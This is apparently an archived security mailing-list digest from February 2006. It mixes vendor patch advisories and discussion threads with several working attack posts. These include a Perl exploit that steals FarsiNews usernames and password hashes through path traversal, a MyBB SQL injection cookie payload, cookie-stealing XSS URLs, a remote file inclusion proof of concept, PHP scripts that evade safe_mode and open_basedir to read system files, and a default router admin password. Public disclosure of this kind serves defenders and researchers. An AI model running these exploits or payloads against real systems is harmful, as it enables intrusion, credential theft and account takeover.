RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=181014

6. RPMs required:

Fedora Core 3:

SRPM:
http://download.fedoralegacy.org/fedora/3/updates/SRPMS/gnutls-1.0.20-3.1.3.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/3/updates/i386/gnutls-1.0.20-3.1.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/i386/gnutls-devel-1.0.20-3.1.3.legacy.i386.rpm

x86_64:
http://download.fedoralegacy.org/fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.x86_64.rpm
http://download.fedoralegacy.org/fedora/3/updates/x86_64/gnutls-devel-1.0.20-3.1.3.legacy.x86_64.rpm


7. Verification:

SHA1 sum Package Name
-

87b93af583ea3abaa48337b0a8c71cba97a45410
fedora/3/updates/i386/gnutls-1.0.20-3.1.3.legacy.i386.rpm
dca7e6e11093d7b8528d82cc9c3f5f1b1c78ea23
fedora/3/updates/i386/gnutls-devel-1.0.20-3.1.3.legacy.i386.rpm
87b93af583ea3abaa48337b0a8c71cba97a45410
fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.i386.rpm
742be40634dc2a32b245f78caf610d0a6b45cb75
fedora/3/updates/x86_64/gnutls-1.0.20-3.1.3.legacy.x86_64.rpm
762630c8973f02bcc934adc8f5a946383f8479cc
fedora/3/updates/x86_64/gnutls-devel-1.0.20-3.1.3.legacy.x86_64.rpm
cce2a463b57be400362624f09dc49a4fdde09305
fedora/3/updates/SRPMS/gnutls-1.0.20-3.1.3.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v filename

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum filename

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0645

9. Contact:

The Fedora Legacy security contact is [EMAIL PROTECTED]. More
project details at http://www.fedoralegacy.org

-


signature.asc
Description: OpenPGP digital signature


FarsiNews 2.5Pro Exploit

2006-02-28 Thread hessamx
#!/usr/bin/perl
#  HESSAM-X 
# FarsiNews 2.5Pro Exploi 
# Exploit by Hessam-x (www.hessamx.net)
#Iran Hackerz Security Team
#WebSite: www.hackerz.ir
#
# Summery
# Name: FarsiNews [www.farsinewsteam.com]
# version : 2.5Pro   
##
# in FarsiNews if you change the archive value :
# http://localhost/index.php?archive=hamid
# see :
# Warning: file([PATH]/data/archives/hamid.news.arch.php): 
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php 
on line 642
# Warning: file([PATH]/data/archives/hamid.comments.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php 
on line 686
# ...[and many other error]
# it means that shows.inc.php  try to open  '/archives/hamid.news.arch.php'  
(and also 'hamid.comments.arch.php')  to read it's data .
# we can change the archive value to '/../users.db.php%00' to see all username 
and password .
# Exploit :
# http://localhost/index.php?archive=/../users.db.php%00
# http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00
# F0und by hamid
use LWP::Simple;

print ---\n;
print = Farsinews 2.5Pro=\n;
print =   By Hessam-x  - www.hackerz.ir =\n;
print ---\n\n;


print Target(www.example.com)\ ;
chomp($targ = STDIN);

print Path: (/fn25/)\;
chomp($path=STDIN);

$url = index.php?archive=/../users.db.php%00;
$page = get(http://.$targ.$path.$url) || die [-] Unable to retrieve: $!;
print [+] Connected to: $targ\n;

$page =~ m/img alt=(.*?) src=/  print [+] Username: $1\n;
$page =~ m/style=border: none; align=right \/(.*?)\/font/  print [+] 
MD5 Password: $1\n;

print [-] Unable to retrieve User ID\n if(!$1);






EJ3 TOPo - Cross Site Scripting Vulnerability

2006-02-28 Thread mail
- Advisory: EJ3 TOPo Cross Site Scripting Vulnerability
- Author: Yunus Emre Yilmaz || Yns [EMAIL PROTECTED]

- Application: EJ3 TOPo ( http://ej3soft.ej3.net )
- Affected Version : v2.2.178 ( maybe older versions..)
- Risk : Critical

– Details : If an attacker access /code/inc_header.php directly , he can bypass 
$gTopNomBer variable.(Register_globals must be “on”)

Problem is about not defining or filtering the variable.

– Proof Of Concept : access /code/inc_header.php like
inc_header.php?gTopNombre=“scriptalert(document.cookie)/script

and print user’s cookie.So an attacker can escape admin’s cookie.

– Release Date: 2006/02/28
– Contacted to vendor : 2006/02/28


MyBB 1.3 NewSQL Injection

2006-02-28 Thread o . y . 6
MyBB New SQL Injection

D3vil-0x1  Devil-00 

Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320

The Inf.File :- 
misc.php

Linez :-

[code]
$buddies = $mybb-user['buddylist'];

$namesarray = explode(,,$buddies);

if(is_array($namesarray))

{

while(list($key, $buddyid) = each($namesarray))

{

$sql .= $comma'$buddyid'; == HERE :) Uncleard Var !!

$comma = ,;

}

$timecut = time() - $mybb-settings['wolcutoff'];

$query = $db-query(SELECT u.*, g.canusepms FROM .TABLE_PREFIX.users 
u LEFT JOIN .TABLE_PREFIX.usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN 
($sql));
[/code]

From 255 to 265

The GLOBALS unset function .. do not unset $_COOKIES .. 
then u can start attacking any var by cookies :)

Tested MyBB 1.3 .. Register_Globals = On

Explorer Exploit :-

1- Login by any username ..
2- Create new cookie (
name= 
comma
value   = 
comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1
 FROM mybb_users WHERE uid=1/*
)

3- Check The URL :- 
HOST/PATH/misc.php?action=buddypopup

Where HOST = The Vic.Server And PATH = MyBB Dir.


QwikiWiki v1.4 XSS Vulnerability

2006-02-28 Thread drdeath_2006
Software - QwikiWiki
Version - v1.4

Type - XSS Vulnerability
Powered by QwikiWiki v1.4 - www.qwikiwiki.com

Examples:
http://(host)/index.php?page=body bgcolor=black/body
http://(host)/index.php?page=alert(document.cookie);/script

Found by Dr^Death of Suicide Scene Internet Security Group 2006


(PHP) imap functions bypass safemode and open_basedir restrictions

2006-02-28 Thread ced . clerget
Vulnerability in c-client library (tested with versions 2000,2001,2004), 
mail_open
could be used to open stream to local files.

For php and imap module

imap_open allow to bypass safemode and open_basedir restrictions.
Use imap_body or others to view a file and imap_list to recursively list a 
directory.

s/mailbox/file :)
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
to create,delete,rename files with apache privileges.

# code #

form action= method=post
select name=switch
option selected=selected value=fileView file/option
option value=dirView dir/option
/select
input type=text size=60 name=string
input type=submit value=go
/form

?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if ($string  $switch == file) {
$stream = imap_open($string, , );
if ($stream == FALSE)
die(Can't open imap stream);

$str = imap_body($stream, 1);
if (!empty($str))
echo pre.$str./pre;
imap_close($stream);
} elseif ($string  $switch == dir) {
$stream = imap_open(/etc/passwd, , );
if ($stream == FALSE)
die(Can't open imap stream);

$string = explode(|,$string);
if (count($string)  1)
$dir_list = imap_list($stream, trim($string[0]), 
trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), *);
echo pre;
for ($i = 0; $i  count($dir_list); $i++)
echo $dir_list[$i]\n;
echo /pre;
imap_close($stream);
}
?




(PHP) mb_send_mail security bypass

2006-02-28 Thread ced . clerget
Vulnerable: PHP4, PHP5
with use of sendmail 8.13.4 

When safemode disabled and open_basedir restriction in effect, we can pass 
extra parameters
to sendmail command in mail function, especially the -C and -X arguments.
-C for alternate configuration file
-X to log all in a file
Can be used to view files, pass the file to view to C argument and store 
content in file
passed to X argument.

When safemode enabled and open_basedir restriction in effect, we can pass extra 
parameters
to sendmail command in mb_send_mail function.

Solution:
Use other sendmail command and don't allow extra parameters for mb_send_mail 
when safemode enabled

?php
if (isset($_REQUEST['file'])) {
$file = sendlog;
if (file_exists($file)) unlink($file);
$extra = -C .$_REQUEST['file']. -X .getcwd()./.$file;
mb_send_mail(NULL, NULL, NULL, NULL, $extra);
echo pre.file_get_contents($file)./pre;
}
?


[security bulletin] SSRT061118 rev.1 - HP System Management Homepage (SMH) Running on Windows: Remote Unauthorized Access

2006-02-28 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00601530
Version: 1

HPSBMA02099 SSRT061118 rev.1 - HP System Management Homepage (SMH)
Running on Windows: Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Release Date: 2006-02-09
Last Updated: 2006-02-27

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company,
HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP
System Management Homepage (SMH) versions 2.0.0 through 2.1.4
running on Microsoft Windows. The vulnerability could be exploited
remotely to allow unauthorized access to files via directory
traversal.

References: None

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) versions 2.0.0 through 2.1.4
running on Microsoft Windows 2000, 2003, 2003 for x64, 2003 for
Itanium and also Windows XP

BACKGROUND

RESOLUTION

HP is providing the following workaround for this issue until such
time as another resolution is available. At that time this
Security Bulletin will be re-released with the latest information.

This workaround involves manually editing the .namazurc file in
the HP SMH installation as described below:

This requires a single line modification to the resource file. The
affected file is located in the installdir\data\help\web_cgi
directory and is called .namazurc.

NOTE:installdir is the base directory where HP SMH is installed.
A typical default installation would be C:\hp\hpsmh” for
installdir

First, copy the .namazurc file to a backup location. If there
are problems during the editing process, the original file can be
restored.

Next, edit the .namazurc file. Search for #Lang in the file to
find the following text:

#Lang ja

Depending on the language and version of HP SMH installed, use the
appropriate method below to edit the file:

 * If the HP SMH installation is an English language installation,
   change the line to:

Lang en

 * If the HP SMH installation is a Japanese language installation
   AND
   the version of HP SMH is 2.0.0 through 2.1.3,
   change the line to:

Lang ja

 * If the HP SMH installation is a Japanese language installation
   AND
   the version of HP SMH is 2.1.4,
   change the line to:

Lang ja_JP.SJIS

NOTE: The # at the beginning of the text must be removed.

To complete the change, save the edited .namazurc file and
restart HP SMH.

PRODUCT SPECIFIC INFORMATION


HISTORY:
Version: 1 (rev.1) Initial release - 27 February 2006



Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: [EMAIL PROTECTED]  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA;
langcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
save.

To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page:
  Subscriber's choice for Business: sign-in.
On the web page:
  Subscriber's Choice: your profile summary
- use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number in the title:

GN = HP General SW,
MA = HP Management Agents,
MI = Misc. 3rd party SW,
MP = HP MPE/iX,
NS = HP NonStop Servers,
OV = HP OpenVMS,
PI = HP Printing  Imaging,
ST = HP Storage SW,
TL = HP Trusted Linux,
TU = HP Tru64 UNIX,
UX = HP-UX,
VV = HP Virtual Vault


System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin in order to
bring to the attention of users of the affected HP products the
important security information contained in this Bulletin. HP
recommends that all users determine the applicability of this
information to their individual situations and take 

Re: NETGEAR WGT624 Wireless DSL router default user name/password vulnerability

2006-02-28 Thread Adam Chesnutt

I checked this against my 602v1 also last night, no go

James Garrison wrote:

Not my WG602v2.

[EMAIL PROTECTED] wrote:
Netgear WG602 reportedly contains a default administrative account. 
This issue can allow a remote attacker to gain administrative access 
to the device.


super_username=Gearguy super_passwd=Geardog


  






[ MDKSA-2006:051 ] - Updated gettext packages fix temporary file vulnerabilities

2006-02-28 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:051
 http://www.mandriva.com/security/
 ___
 
 Package : gettext
 Date: February 28, 2006
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 The Trustix developers discovered temporary file vulnerabilities in the
 autopoint and gettextize scripts, part of GNU gettext.  These scripts
 insecurely created temporary files which could allow a malicious user
 to overwrite another user's files via a symlink attack.
 
 The updated packages have been patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0966
 ___
 
 Updated Packages:
 
 Corporate 3.0:
 3e90a65b63c6cef50ea2362b97d601af  
corporate/3.0/RPMS/gettext-0.13.1-1.3.C30mdk.i586.rpm
 88645a36cc137b6d15baff31df84bb5f  
corporate/3.0/RPMS/gettext-base-0.13.1-1.3.C30mdk.i586.rpm
 122cf7a4d0173cd80c3c6a388b76ec5a  
corporate/3.0/RPMS/gettext-devel-0.13.1-1.3.C30mdk.i586.rpm
 d9e9d121c5833e80c9bbd642af24fb40  
corporate/3.0/RPMS/gettext-java-0.13.1-1.3.C30mdk.i586.rpm
 7aa6d70debb3c1814333fca662e23cac  
corporate/3.0/RPMS/libgettextmisc-0.13.1-1.3.C30mdk.i586.rpm
 cfe279f682d65f910505e069b911d7c7  
corporate/3.0/RPMS/libintl2-0.13.1-1.3.C30mdk.i586.rpm
 fc15df73311804bf0fd371fa9682c0c5  
corporate/3.0/SRPMS/gettext-0.13.1-1.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c3648f970e7794014773ddedd68eaf91  
x86_64/corporate/3.0/RPMS/gettext-0.13.1-1.3.C30mdk.x86_64.rpm
 d876576394822262df7e2351775c1aaa  
x86_64/corporate/3.0/RPMS/gettext-base-0.13.1-1.3.C30mdk.x86_64.rpm
 af77cf6ee5a7d238ec122fbc4af7d353  
x86_64/corporate/3.0/RPMS/gettext-devel-0.13.1-1.3.C30mdk.x86_64.rpm
 1173d049f6621cd8ff8d0396d24eb097  
x86_64/corporate/3.0/RPMS/gettext-java-0.13.1-1.3.C30mdk.x86_64.rpm
 f757f8a584bfc7ebd99d13a92415241b  
x86_64/corporate/3.0/RPMS/lib64gettextmisc-0.13.1-1.3.C30mdk.x86_64.rpm
 ecb7b9c26a607287c10f12bc70d5ffa9  
x86_64/corporate/3.0/RPMS/lib64intl2-0.13.1-1.3.C30mdk.x86_64.rpm
 fc15df73311804bf0fd371fa9682c0c5  
x86_64/corporate/3.0/SRPMS/gettext-0.13.1-1.3.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 bf7a130a64632e27c4c0e35bcce1838d  
mnf/2.0/RPMS/gettext-0.13.1-1.3.M20mdk.i586.rpm
 26b569b31b5786eb3dc90c466ad42951  
mnf/2.0/RPMS/gettext-base-0.13.1-1.3.M20mdk.i586.rpm
 513319968508b7d6c22135aed2a4ebcf  
mnf/2.0/RPMS/gettext-devel-0.13.1-1.3.M20mdk.i586.rpm
 8ebc491dd574ec6e9624776b39adb08e  
mnf/2.0/RPMS/gettext-java-0.13.1-1.3.M20mdk.i586.rpm
 d7efcc35298ade62c0d21b75cec11d35  
mnf/2.0/RPMS/libgettextmisc-0.13.1-1.3.M20mdk.i586.rpm
 d0993ab7f263642207f1ae95f4861525  
mnf/2.0/RPMS/libintl2-0.13.1-1.3.M20mdk.i586.rpm
 76fec48911a57db5edad551ae40cb3d1  
mnf/2.0/SRPMS/gettext-0.13.1-1.3.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFEBKdDmqjQ0CJFipgRAhZHAJ9pXeM/Z7BFLAZ1zymn5CDFGiDNjQCgyy01
o5an648yuWxgj8BfvaEBjws=
=aKl0
-END PGP SIGNATURE-



PEHEPE Membership Management System Multiple Vulnerabilities

2006-02-28 Thread mail
- Advisory: PEHEPE Membership Management System Multiple Vulnerabilities
- Author: Yunus Emre Yilmaz -- mail[at]yunusemreyilmaz(dot)com

- Application: PEHEPE MemberShip Management System 
(http://www.pehepe.org/UYEL#304;K3)
- Affected Version : v3 ( maybe older versions..)
- Risk : Critical

-- Details[0] : XSS Vulnerability
   An attacker can manupulate the value of $kul_adi, if s/he opens sol_menu.php 
directly.
Sol_menu.php is an included page, but the attacker can access it directly. So, 
the value of $kul_adi 
can be changed from the address bar.

-- Proof of Concept:
http://target_site/script_path/sol_menu.php?kuladi=;scriptalert(document.cookie)/script

-- Details[1] :Remote Code Execution Vulnerability
 There is a require command in sol_menu.php. The attacker can bypass the 
constant UYE_SEVIYE using a , querystring like misafir[]=UYE_SEVIYE. So the 
remote code is executing. As a result, the attacker can change the value of the 
first parameter of the require function which is named as uye_klasor.(dir for 
remote url)

-- Proof Of Concept:
sol_menu.php?uye_klasor=http://www.example.orgmisafir[]=UYE_SEVIYE

-- Note : For using these vulnerabilities, register_globals must be on.

Original URL : 
http://yns.zaxaz.com/2006/02/28/pehepe-membership-management-system-multiple-vulnerabilities/

 


bttlxeForum 2.* XSS Vulnerability

2006-02-28 Thread stormhacker
Summary
Software: bttlxeForum
Sowtware's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus 
(worlddefacers.de securitycentra.com)
-Description---
Vulnerable Script: failure.asp
--Exploit--
http://www.example.comforums/failure.asp?err_txt=scriptalert(document.cookie);/script
--Solution-
No Patch available.

--Credit---
Discovered by: runvirus
(worlddefacers.de securitycentra.com)



Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Renaud Lifchitz
Hello,

If you carefully look at the inline attachments, you will find this
(first proof of concept) :

htmlhead/headbody style=margin: 0px; padding: 0px; border:
0px;iframe src=http://www.sysdream.com; width=100% height=100%
frameborder=0 marginheight=0 marginwidth=0/iframe

The information disclosure doesn't come from the first iframe, but from
the second one. Indeed, the inline attachment basic.html itself
contains a iframe, which is not correctly filtered and makes Thunderbird
fetch any external resource.


Best regards,

Renaud Lifchitz
http://www.sysdream.com




Daniel Veditz wrote:

Renaud Lifchitz wrote:
  

Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities



We believe this to be a testing error. The problem of loading remote
iframe and css content was fixed prior to the release of Mozilla
Thunderbird 1.0

The testcase included in the advisory contains the iframe and css
content in-line with the message. That will always be shown as there is
no privacy issue with doing so and does not demonstrate the remote
loading issue claimed.

Once a user has pressed the Show Images button--not the best label
since it covers all remote content--that state is stored in the mailbox
metadata/index file (.msf) and the remote content will then be loaded on
future viewings. If the .msf file is not deleted between tests this
could give the appearance of the bug described in the advisory.

There is a minor residual privacy issue if people whose mail you keep
and reread are setting webbugs on you (your boss could find out how many
times you read his memo?), but in most cases your privacy is fully blown
once you load the remote content the first time.


  




recursive DNS servers DDoS as a growing DDoS problem

2006-02-28 Thread Gadi Evron

Hi guys.

We discussed recursive DNS servers before (servers which allow to query 
anything - including what they are not authoritative for, through them).


The attack currently in the wild is a lot bigger and more complicated 
than this, but to begin, here is an explanation (by metaphor) of that part:
Spoofed ICMP attacks have been around for a while. How many of us still 
get quite a bit of ICMP echo replies stopped at our borders? These 
replies come to us due to spoofed attacks using our addresses.


Now, imagine it - only bigger:
Smurf.

Introduce an amplification effect.

As bigger UDP packets will be fragmented by the servers, and UDP 
obviously does not do any handshake and can easily be spoofed...
The server receives a large packet, breaks it down to several fragments 
and moves the query on.

That's where the amplification effect _starts_.

Both the attacked server and the unwilling participant in the attack, 
the recursive servers, experience a serious DNS denial of service that 
keeps getting amplified considerably.


One of the problems is obviously the spoofing. Let us, metaphorically 
and WRONGLY treat it for a minute as the remote exploit.


The second part of this problem is the recursive server, which for the 
moment we will WRONGLY treat as the local exploit.


Obviously both need to be fixed. Which is easier I am not so sure.

In the past, most network operators refused to implement best practices 
such as BCP38 (go Fergie!) because they saw no reason for the hassle. 
Returning back to: if it isn't being exploited right now, why should I 
worry about it?


Well, it is being exploited now, and will be further exploited in the 
future. Combating spoofing on the Internet is indeed important and now 
becoming critical.


Removing the spoofing part for a second, the attack vector for this can 
easily be replaced, as one example, with a botnet.


A million Trojaned hosts sending in even one packet a minute would cause 
quite a buzz - and do. Now amplify the effect by the recursive servers 
and...


So, putting the spoofing aside, what do we do about our recursive servers?

There are some good URL's for that, here are some:
http://www.us-cert.gov/reading_room/DNS-recursion121605.pdf
http://cc.uoregon.edu/cnews/winter2006/recursive.htm
http://dns.measurement-factory.com/surveys/sum1.html

The recursive behaviour is necessary for some authoritative servers, but 
not for all. As a best practice for organizations, as an example, the 
server facing the world should not also be the one facing your 
organization (your users/clients). Limiting this ability to your network 
space is also a good idea.


If you would like to check for yourselves, here is a message from Duane 
Wessels [1] to the DNS-operations [2] mailing list where this is 
currently being discussed:

-
If anyone has the need to test particular addresses for the
presence of open resolvers, please feel free to use this tool:

http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl

It will send a single recursion desired query to a target address.
If that query is forwarded to our authoritative server, the host
has an open resolver running at that address.
-

Dan (DA MAN) Kaminsky and Mike Schiffman have done some impressive work 
on this subject, outlined in Dan's latest ShmooCon talk.

They found ~580K open resolvers:
http://deluvian.doxpara.com/, http://www.doxpara.com/

I suggest those of us who need more information or help go to the 
DNS-operations mailing list from OARC (see below) and ask the experts 
there, now that this is finally public.


Thanks,

Gadi.

[1] Duane Wessels - DNS genius and among other accomplishments the 
author of dns top.

[2] DNS-operations - http://lists.oarci.net/mailman/listinfo/dns-operations

--
http://blogs.securiteam.com/

Out of the box is where I live.
-- Cara Starbuck Thrace, Battlestar Galactica.


Re: Bypass Fortinet anti-virus using FTP

2006-02-28 Thread Mathieu Dessus
 Information pertaining to this vulnerability has been posted on Fortinet's 
 security advisories web page.
 http://www.fortinet.com/FortiGuardCenter/ftp_vuln.html

On this page,  we can read Fortinet advises that a RECENTLY
discovered vulnerability
It was just discovered and announced to Fortinet SEVEN MONTHS ago ! 
Remember the time line:
http://mdessus.free.fr/fortinet/av_bypass.txt


Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Daniel Veditz
Renaud Lifchitz wrote:
 Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

We believe this to be a testing error. The problem of loading remote
iframe and css content was fixed prior to the release of Mozilla
Thunderbird 1.0

The testcase included in the advisory contains the iframe and css
content in-line with the message. That will always be shown as there is
no privacy issue with doing so and does not demonstrate the remote
loading issue claimed.

Once a user has pressed the Show Images button--not the best label
since it covers all remote content--that state is stored in the mailbox
metadata/index file (.msf) and the remote content will then be loaded on
future viewings. If the .msf file is not deleted between tests this
could give the appearance of the bug described in the advisory.

There is a minor residual privacy issue if people whose mail you keep
and reread are setting webbugs on you (your boss could find out how many
times you read his memo?), but in most cases your privacy is fully blown
once you load the remote content the first time.


Re: [Full-disclosure] Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006-02-28 Thread Daniel Veditz
Daniel Veditz wrote:
 [a plain text message]

Just got half a dozen bounces because my plain-text email supposedly
contained Suspicious I-Frame.a (Malicious Mobile Code) virus. Those of
you behind McAfee GroupShield barriers may not be getting the whole
conversation here if people can't even use words like i-frame in plain
text without being suppressed as a virus.

(remove the hyphen in i-frame throughout)